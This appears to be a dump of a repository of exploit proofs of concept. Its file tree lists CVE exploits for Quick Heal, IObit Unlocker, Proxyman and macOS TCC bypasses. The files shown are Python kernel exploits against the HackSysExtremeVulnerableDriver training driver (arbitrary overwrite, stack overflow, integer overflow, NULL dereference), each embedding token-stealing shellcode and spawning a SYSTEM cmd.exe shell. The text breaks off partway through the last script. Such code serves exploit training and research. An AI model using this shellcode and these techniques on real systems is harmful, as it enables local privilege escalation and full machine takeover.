├── .gitignore ├── HEVD ├── hacksysAO.py ├── hacksysBOF.py ├── hacksysBOFGS.py ├── hacksysINT.py ├── hacksysNULL.py ├── hacksysPOOL-kex.py ├── hacksysPOOL.py ├── hacksysTYPE.py ├── hacksysUAF.py ├── hacksysUIHEAP.py └── hacksysUISTACK.py ├── cve-2015-8285_Quick_Heal_16_webssx.sys └── qh-webssx-bsod.py ├── cve-2019-20057_proxyman_privhelper └── PMCocoa │ ├── PMCocoa.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata │ │ │ └── csaby.xcuserdatad │ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata │ │ └── csaby.xcuserdatad │ │ └── xcschemes │ │ └── xcschememanagement.plist │ └── PMCocoa │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json │ ├── Base.lproj │ └── Main.storyboard │ ├── Info.plist │ ├── PMCocoa.entitlements │ ├── ViewController.h │ ├── ViewController.m │ └── main.m ├── cve-2020-14974_iobit_unlocker └── UnlockExploit │ ├── UnlockExploit.sln │ ├── UnlockExploit │ ├── UnlockExploit.cpp │ ├── UnlockExploit.vcxproj │ ├── UnlockExploit.vcxproj.filters │ └── UnlockExploit.vcxproj.user │ └── x64 │ └── Release │ └── UnlockExploit.exe ├── cve-2021-1784_tcc_bypass_hdiutil ├── cve-2021-1784_tcc_bypass_hdiutil.mov └── tccbypass.py ├── cve-2021-1815_macos_cfprefsd_lpe └── prefs.m ├── cve-2021-30782_tcc_apptranslocation ├── xpctrans.c └── xpctrans.mov ├── cve-2022-22655_macos_tcc_adminconfig_bypass ├── bypass-config.sh └── poc-admintcc-bypass.sh └── cve-2023-32413-chmodfd └── chmodfd.c /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | IOBit Unlocker 1.2 LPE/.DS_Store 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /HEVD/hacksysAO.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import struct, os 4 | import platform 5 | 6 | GENERIC_READ = 0x80000000 7 | GENERIC_WRITE = 0x40000000 8 | OPEN_EXISTING = 0x3 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | METHOD_NEITHER = 0x3 16 | FILE_ANY_ACCESS = 0x0 17 | FILE_DEVICE_UNKNOWN = 0x00000022 18 | 19 | 20 | kernel32 = windll.kernel32 21 | ntdll = windll.ntdll 22 | Psapi = windll.Psapi 23 | 24 | def ctl_code(function, 25 | devicetype = FILE_DEVICE_UNKNOWN, 26 | access = FILE_ANY_ACCESS, 27 | method = METHOD_NEITHER): 28 | """Recreate CTL_CODE macro to generate driver IOCTL""" 29 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 30 | 31 | def alloc_memory(base_address, input, input_size): 32 | """ 33 | Allocate input buffer 34 | """ 35 | print "[*] Allocating input buffer at %s" % hex(base_address) 36 | base_address_c = c_int(base_address) 37 | input_size_c = c_int(input_size) 38 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 39 | POINTER(c_int), 40 | c_ulong, 41 | POINTER(c_int), 42 | c_int, 43 | c_int] 44 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 45 | byref(base_address_c), 46 | 0x0, 47 | byref(input_size_c), 48 | MEM_RESERVE|MEM_COMMIT, 49 | PAGE_EXECUTE_READWRITE) 50 | if dwStatus != STATUS_SUCCESS: 51 | print "[-] Error while allocating memory: %s" % dwStatus 52 | getLastError() 53 | sys.exit() 54 | written = c_ulong() 55 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 56 | if alloc == 0: 57 | print "[-] Error while writing our input buffer memory: %s" % alloc 58 | getLastError() 59 | sys.exit() 60 | 61 | def tokenstealingx86(RETVAL, extra = ""): 62 | """ 63 | Retrun a token stealing shellcode 64 | """ 65 | #Windows 7 SP1 x86 66 | KPROCESS = '\x50' 67 | TOKEN = '\xF8' 68 | UPID = '\xB4' 69 | APLINKS = '\xB8' 70 | 71 | shellcode = ( 72 | "\x60" # pushad 73 | "\x33\xc0" # xor eax,eax 74 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 75 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 76 | "\x8b\xc8" # mov ecx,eax 77 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 78 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 79 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 80 | "\x75\xec" # jne 0xe 81 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 82 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 83 | "\x61" # popad 84 | ) 85 | 86 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 87 | 88 | if RETVAL == "": 89 | shellcode += "\xc3" #retn 90 | else: 91 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 92 | 93 | return shellcode 94 | 95 | def find_driver_base(driver=None): 96 | #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py 97 | if platform.architecture()[0] == '64bit': 98 | lpImageBase = (c_ulonglong * 1024)() 99 | lpcbNeeded = c_longlong() 100 | Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32] 101 | else: 102 | lpImageBase = (c_ulong * 1024)() 103 | lpcbNeeded = c_long() 104 | driver_name_size = c_long() 105 | driver_name_size.value = 48 106 | Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded)) 107 | for base_addr in lpImageBase: 108 | driver_name = c_char_p('\x00' * driver_name_size.value) 109 | if base_addr: 110 | Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value) 111 | if driver == None and driver_name.value.lower().find("krnl") != -1: 112 | print "[+] Retrieving kernel info..." 113 | print "[+] Kernel version:", driver_name.value 114 | print "[+] Kernel base address: %s" % hex(base_addr) 115 | return (base_addr, driver_name.value) 116 | elif driver_name.value.lower() == driver: 117 | print "[+] Retrieving %s info..." % driver_name 118 | print "[+] %s base address: %s" % (driver_name, hex(base_addr)) 119 | return (base_addr, driver_name.value) 120 | return None 121 | 122 | def get_haldispatchtable(): 123 | #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py 124 | if platform.architecture()[0] == '64bit': 125 | kernel32.LoadLibraryExA.restype = c_uint64 126 | kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)] 127 | kernel32.GetProcAddress.restype = c_uint64 128 | (krnlbase, kernelver) = find_driver_base() 129 | hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) 130 | HalDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable') 131 | HalDispatchTable -= hKernel 132 | HalDispatchTable += krnlbase 133 | print "[+] HalDispatchTable address:", hex(HalDispatchTable) 134 | return HalDispatchTable 135 | 136 | if __name__ == '__main__': 137 | print "[*] HackSysExtremeVulnerableDriver Arbitrary Overwrite privilige escalation" 138 | 139 | IOCTL_VULN = 0x0022200b # 140 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 141 | dwReturn = c_ulong() 142 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 143 | 144 | #allocate input memory 145 | HALDISPATCH = get_haldispatchtable() 146 | HalDispatchTable0x4 = HALDISPATCH + 0x4 147 | size = 0x1000 148 | input = "\x08\x00\x41\x41" #address containing the address of the shellcode 149 | input += struct.pack("L", HalDispatchTable0x4) #HALDISPATCH 150 | input += "\x42\x42\x42\x42" #address of the shellcode 151 | input += "\x42" * (size - len(input)) 152 | alloc_memory(0x41410000, input, size) 153 | 154 | #allocate shellcode in memory 155 | SHELLCODE = tokenstealingx86(RETVAL = "") 156 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 157 | alloc_memory(0x42424242, stuff, 0x1000) 158 | 159 | inputbuffer = 0x41410000 #memory address of the input buffer 160 | inputbuffer_size = 0x1000 161 | outputbuffer_size = 0x0 162 | IoStatusBlock = c_ulong() 163 | if driver_handle: 164 | print "[*] Sending IOCTL and data to the driver..." 165 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 166 | None, 167 | None, 168 | None, 169 | byref(IoStatusBlock), 170 | IOCTL_VULN, 171 | inputbuffer, 172 | inputbuffer_size, 173 | None, 174 | 0x0 175 | ) 176 | ## Trigger shellcode 177 | inp = c_ulong() 178 | out = c_ulong() 179 | inp = 0x1337 180 | tmp = ntdll.NtQueryIntervalProfile(inp, byref(out)) 181 | 182 | if 'system' in os.popen('whoami').read(): 183 | print "[+] Getting system shell..." 184 | os.system("cmd.exe") 185 | else: 186 | print '[-] Failed to elevate privileges' 187 | -------------------------------------------------------------------------------- /HEVD/hacksysBOF.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | kernel32 = windll.kernel32 15 | ntdll = windll.ntdll 16 | 17 | def alloc_memory(base_address, input, input_size): 18 | """ 19 | Allocate input buffer 20 | """ 21 | print "[*] Allocating input buffer at %s" % hex(base_address) 22 | base_address_c = c_int(base_address) 23 | input_size_c = c_int(input_size) 24 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 25 | POINTER(c_int), 26 | c_ulong, 27 | POINTER(c_int), 28 | c_int, 29 | c_int] 30 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 31 | byref(base_address_c), 32 | 0x0, 33 | byref(input_size_c), 34 | MEM_RESERVE|MEM_COMMIT, 35 | PAGE_EXECUTE_READWRITE) 36 | if dwStatus != STATUS_SUCCESS: 37 | print "[-] Error while allocating memory: %s" % dwStatus 38 | getLastError() 39 | sys.exit() 40 | written = c_ulong() 41 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 42 | if alloc == 0: 43 | print "[-] Error while writing our input buffer memory: %s" % alloc 44 | getLastError() 45 | sys.exit() 46 | 47 | def tokenstealingx86(RETVAL, extra = ""): 48 | """ 49 | Retrun a token stealing shellcode 50 | """ 51 | #Windows 7 SP1 x86 52 | KPROCESS = '\x50' 53 | TOKEN = '\xF8' 54 | UPID = '\xB4' 55 | APLINKS = '\xB8' 56 | 57 | shellcode = ( 58 | "\x60" # pushad 59 | "\x33\xc0" # xor eax,eax 60 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 61 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 62 | "\x8b\xc8" # mov ecx,eax 63 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 64 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 65 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 66 | "\x75\xec" # jne 0xe 67 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 68 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 69 | "\x61" # popad 70 | ) 71 | 72 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 73 | 74 | if RETVAL == "": 75 | shellcode += "\xc3" #retn 76 | else: 77 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 78 | 79 | return shellcode 80 | 81 | if __name__ == '__main__': 82 | print "[*] HackSysExtremeVulnerableDriver Stack Buffer Overflow privilige escalation" 83 | 84 | IOCTL_VULN = 0x00222003 85 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 86 | dwReturn = c_ulong() 87 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 88 | 89 | #allocate input memory 90 | alloc_memory(0x41410000, "\x42" * 0x824, 0x824) 91 | 92 | #allocate shellcode in memory 93 | SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x33\xc0\x5D') 94 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 95 | alloc_memory(0x42424242, stuff, 0x1000) 96 | 97 | inputbuffer = 0x41410000 #memory address of the input buffer 98 | inputbuffer_size = 0x824 99 | outputbuffer_size = 0x0 100 | IoStatusBlock = c_ulong() 101 | if driver_handle: 102 | print "[*] Sending IOCTL and data to the driver..." 103 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 104 | None, 105 | None, 106 | None, 107 | byref(IoStatusBlock), 108 | IOCTL_VULN, 109 | inputbuffer, 110 | inputbuffer_size, 111 | None, 112 | 0x0 113 | ) 114 | if 'system' in os.popen('whoami').read(): 115 | print "[+] Getting system shell..." 116 | os.system("cmd.exe") 117 | else: 118 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysBOFGS.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | METHOD_NEITHER = 0x3 15 | FILE_ANY_ACCESS = 0x0 16 | FILE_DEVICE_UNKNOWN = 0x00000022 17 | 18 | 19 | kernel32 = windll.kernel32 20 | ntdll = windll.ntdll 21 | 22 | def ctl_code(function, 23 | devicetype = FILE_DEVICE_UNKNOWN, 24 | access = FILE_ANY_ACCESS, 25 | method = METHOD_NEITHER): 26 | """Recreate CTL_CODE macro to generate driver IOCTL""" 27 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 28 | 29 | def alloc_memory(base_address, input, input_size): 30 | """ 31 | Allocate input buffer 32 | """ 33 | print "[*] Allocating input buffer at %s" % hex(base_address) 34 | base_address_c = c_int(base_address) 35 | input_size_c = c_int(input_size) 36 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 37 | POINTER(c_int), 38 | c_ulong, 39 | POINTER(c_int), 40 | c_int, 41 | c_int] 42 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 43 | byref(base_address_c), 44 | 0x0, 45 | byref(input_size_c), 46 | MEM_RESERVE|MEM_COMMIT, 47 | PAGE_EXECUTE_READWRITE) 48 | if dwStatus != STATUS_SUCCESS: 49 | print "[-] Error while allocating memory: %s" % dwStatus 50 | getLastError() 51 | sys.exit() 52 | written = c_ulong() 53 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 54 | if alloc == 0: 55 | print "[-] Error while writing our input buffer memory: %s" % alloc 56 | getLastError() 57 | sys.exit() 58 | 59 | def tokenstealingx86(RETVAL, extra = ""): 60 | """ 61 | Retrun a token stealing shellcode 62 | """ 63 | #Windows 7 SP1 x86 64 | KPROCESS = '\x50' 65 | TOKEN = '\xF8' 66 | UPID = '\xB4' 67 | APLINKS = '\xB8' 68 | 69 | shellcode = ( 70 | "\x60" # pushad 71 | "\x33\xc0" # xor eax,eax 72 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 73 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 74 | "\x8b\xc8" # mov ecx,eax 75 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 76 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 77 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 78 | "\x75\xec" # jne 0xe 79 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 80 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 81 | "\x61" # popad 82 | ) 83 | 84 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 85 | 86 | if RETVAL == "": 87 | shellcode += "\xc3" #retn 88 | else: 89 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 90 | 91 | return shellcode 92 | 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver Stack BoF w/ GS privilige escalation" 96 | 97 | IOCTL_VULN = ctl_code(0x801) #HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS 98 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 99 | dwReturn = c_ulong() 100 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 101 | 102 | #allocate input memory, a full page (4096 bytes) 103 | alloc_memory(0x41410000, "\x42" * 0x1000, 0x1000) 104 | 105 | #allocate shellcode in memory 106 | """ 107 | extra code needed to restore stack and other data at the end of the token stealing shellcode in order to able to continue: 108 | 0: 81 c4 8c 07 00 00 add esp,0x78c ; offset for IRP 109 | 6: 8b 3c 24 mov edi,DWORD PTR [esp] ; restore IRP 110 | 9: 83 c4 08 add esp,0x8 ; offset for DbgPrint info 111 | c: 8b 1c 24 mov ebx,DWORD PTR [esp] ; ebx is needed for DbGPrint 112 | f: 81 c4 34 02 00 00 add esp,0x234 ; align back stack to move to IOCompletion 113 | 15: 31 c0 xor eax,eax 114 | 17: 5d pop ebp ; restore EBP 115 | """ 116 | #return value is 0x8 as that is what is used by the function 117 | SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x81\xC4\x8c\x07\x00\x00\x8B\x3C\x24\x83\xC4\x08\x8B\x1C\x24\x81\xC4\x34\x02\x00\x00\x31\xC0\x5D') 118 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 119 | alloc_memory(0x42424242, stuff, 0x1000) 120 | 121 | #0x214 is the offset to overwrite the exception handler 122 | #once it's overwritten we will cause a PAGE_FAULT as only 0x41410000 page is allocated 123 | #we start to read from close to the end of the page 124 | inputbuffer = 0x41410000 + 0x1000 - 0x214 #memory address of the input buffer 125 | inputbuffer_size = 0x218 #this will guarantee that we cause a page fault 126 | outputbuffer_size = 0x0 127 | IoStatusBlock = c_ulong() 128 | if driver_handle: 129 | print "[*] Sending IOCTL and data to the driver..." 130 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 131 | None, 132 | None, 133 | None, 134 | byref(IoStatusBlock), 135 | IOCTL_VULN, 136 | inputbuffer, 137 | inputbuffer_size, 138 | None, 139 | 0x0 140 | ) 141 | if 'system' in os.popen('whoami').read(): 142 | print "[+] Getting system shell..." 143 | os.system("cmd.exe") 144 | else: 145 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysINT.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | GENERIC_READ = 0x80000000 7 | GENERIC_WRITE = 0x40000000 8 | OPEN_EXISTING = 0x3 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | METHOD_NEITHER = 0x3 16 | FILE_ANY_ACCESS = 0x0 17 | FILE_DEVICE_UNKNOWN = 0x00000022 18 | 19 | 20 | kernel32 = windll.kernel32 21 | ntdll = windll.ntdll 22 | 23 | def ctl_code(function, 24 | devicetype = FILE_DEVICE_UNKNOWN, 25 | access = FILE_ANY_ACCESS, 26 | method = METHOD_NEITHER): 27 | """Recreate CTL_CODE macro to generate driver IOCTL""" 28 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 29 | 30 | def alloc_memory(base_address, input, input_size): 31 | """ 32 | Allocate input buffer 33 | """ 34 | print "[*] Allocating input buffer at %s" % hex(base_address) 35 | base_address_c = c_int(base_address) 36 | input_size_c = c_int(input_size) 37 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 38 | POINTER(c_int), 39 | c_ulong, 40 | POINTER(c_int), 41 | c_int, 42 | c_int] 43 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 44 | byref(base_address_c), 45 | 0x0, 46 | byref(input_size_c), 47 | MEM_RESERVE|MEM_COMMIT, 48 | PAGE_EXECUTE_READWRITE) 49 | if dwStatus != STATUS_SUCCESS: 50 | print "[-] Error while allocating memory: %s" % dwStatus 51 | getLastError() 52 | sys.exit() 53 | written = c_ulong() 54 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 55 | if alloc == 0: 56 | print "[-] Error while writing our input buffer memory: %s" % alloc 57 | getLastError() 58 | sys.exit() 59 | 60 | def tokenstealingx86(RETVAL, extra = ""): 61 | """ 62 | Retrun a token stealing shellcode 63 | """ 64 | #Windows 7 SP1 x86 65 | KPROCESS = '\x50' 66 | TOKEN = '\xF8' 67 | UPID = '\xB4' 68 | APLINKS = '\xB8' 69 | 70 | shellcode = ( 71 | "\x60" # pushad 72 | "\x33\xc0" # xor eax,eax 73 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 74 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 75 | "\x8b\xc8" # mov ecx,eax 76 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 77 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 78 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 79 | "\x75\xec" # jne 0xe 80 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 81 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 82 | "\x61" # popad 83 | ) 84 | 85 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 86 | 87 | if RETVAL == "": 88 | shellcode += "\xc3" #retn 89 | else: 90 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 91 | 92 | return shellcode 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver integer overflow privilige escalation" 96 | 97 | 98 | IOCTL_VULN = ctl_code(0x809) # 99 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 100 | dwReturn = c_ulong() 101 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 102 | 103 | #allocate input 104 | size = 0x1000 105 | input = 0x82c * "\x42" #overwrite return pointer (kernel buffer size = 824) 106 | input += struct.pack("L", 0xBAD0B0B0) #to stop copy 107 | input += (size - len(input)) * "\x42" 108 | alloc_memory(0x41410000, input, size) 109 | 110 | #allocate shellcode in memory 111 | SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x33\xc0\x5D') 112 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE)) 113 | alloc_memory(0x42424242, stuff, size) 114 | 115 | inputbuffer = 0x41410000 #memory address of the input buffer 116 | inputbuffer_size = 0xffffffff #causing int overflow when checked with +4 117 | outputbuffer_size = 0x0 118 | IoStatusBlock = c_ulong() 119 | if driver_handle: 120 | print "[*] Sending IOCTL and data to the driver..." 121 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 122 | None, 123 | None, 124 | None, 125 | byref(IoStatusBlock), 126 | IOCTL_VULN, 127 | inputbuffer, 128 | inputbuffer_size, 129 | None, 130 | 0x0 131 | ) 132 | 133 | if 'system' in os.popen('whoami').read(): 134 | print "[+] Getting system shell..." 135 | os.system("cmd.exe") 136 | else: 137 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysNULL.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | GENERIC_READ = 0x80000000 7 | GENERIC_WRITE = 0x40000000 8 | OPEN_EXISTING = 0x3 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | METHOD_NEITHER = 0x3 16 | FILE_ANY_ACCESS = 0x0 17 | FILE_DEVICE_UNKNOWN = 0x00000022 18 | 19 | 20 | kernel32 = windll.kernel32 21 | ntdll = windll.ntdll 22 | 23 | def ctl_code(function, 24 | devicetype = FILE_DEVICE_UNKNOWN, 25 | access = FILE_ANY_ACCESS, 26 | method = METHOD_NEITHER): 27 | """Recreate CTL_CODE macro to generate driver IOCTL""" 28 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 29 | 30 | def alloc_memory(base_address, input, input_size): 31 | """ 32 | Allocate input buffer 33 | """ 34 | print "[*] Allocating input buffer at %s" % hex(base_address) 35 | base_address_c = c_int(base_address) 36 | input_size_c = c_int(input_size) 37 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 38 | POINTER(c_int), 39 | c_ulong, 40 | POINTER(c_int), 41 | c_int, 42 | c_int] 43 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 44 | byref(base_address_c), 45 | 0x0, 46 | byref(input_size_c), 47 | MEM_RESERVE|MEM_COMMIT, 48 | PAGE_EXECUTE_READWRITE) 49 | if dwStatus != STATUS_SUCCESS: 50 | print "[-] Error while allocating memory: %s" % dwStatus 51 | getLastError() 52 | sys.exit() 53 | written = c_ulong() 54 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 55 | if alloc == 0: 56 | print "[-] Error while writing our input buffer memory: %s" % alloc 57 | getLastError() 58 | sys.exit() 59 | 60 | def tokenstealingx86(RETVAL, extra = ""): 61 | """ 62 | Retrun a token stealing shellcode 63 | """ 64 | #Windows 7 SP1 x86 65 | KPROCESS = '\x50' 66 | TOKEN = '\xF8' 67 | UPID = '\xB4' 68 | APLINKS = '\xB8' 69 | 70 | shellcode = ( 71 | "\x60" # pushad 72 | "\x33\xc0" # xor eax,eax 73 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 74 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 75 | "\x8b\xc8" # mov ecx,eax 76 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 77 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 78 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 79 | "\x75\xec" # jne 0xe 80 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 81 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 82 | "\x61" # popad 83 | ) 84 | 85 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 86 | 87 | if RETVAL == "": 88 | shellcode += "\xc3" #retn 89 | else: 90 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 91 | 92 | return shellcode 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver NULL pointer dereference privilige escalation" 96 | 97 | 98 | IOCTL_VULN = ctl_code(0x80a) #22202b 99 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 100 | dwReturn = c_ulong() 101 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 102 | 103 | #allocate crafted input memory w/ shellcode 104 | size = 0x1000 105 | input = struct.pack("L", 0xBAD0B0B1) # dont match "\xb0\xb0\xd0\xba" 106 | SHELLCODE = tokenstealingx86(RETVAL = "") 107 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - 0x4 - len(SHELLCODE)) 108 | input += stuff 109 | alloc_memory(0x41410000, input, size) 110 | 111 | #allocate null page 112 | size = 0x1000 113 | input = struct.pack("L", 0x41410004) #shellcode address 114 | input += "\x42" * (size - len(input)) 115 | alloc_memory(0x00000004, input, size) 116 | 117 | inputbuffer = 0x41410000 #memory address of the input buffer 118 | inputbuffer_size = 0x1000 119 | outputbuffer_size = 0x0 120 | IoStatusBlock = c_ulong() 121 | if driver_handle: 122 | print "[*] Sending IOCTL and data to the driver..." 123 | dev_ioctl = 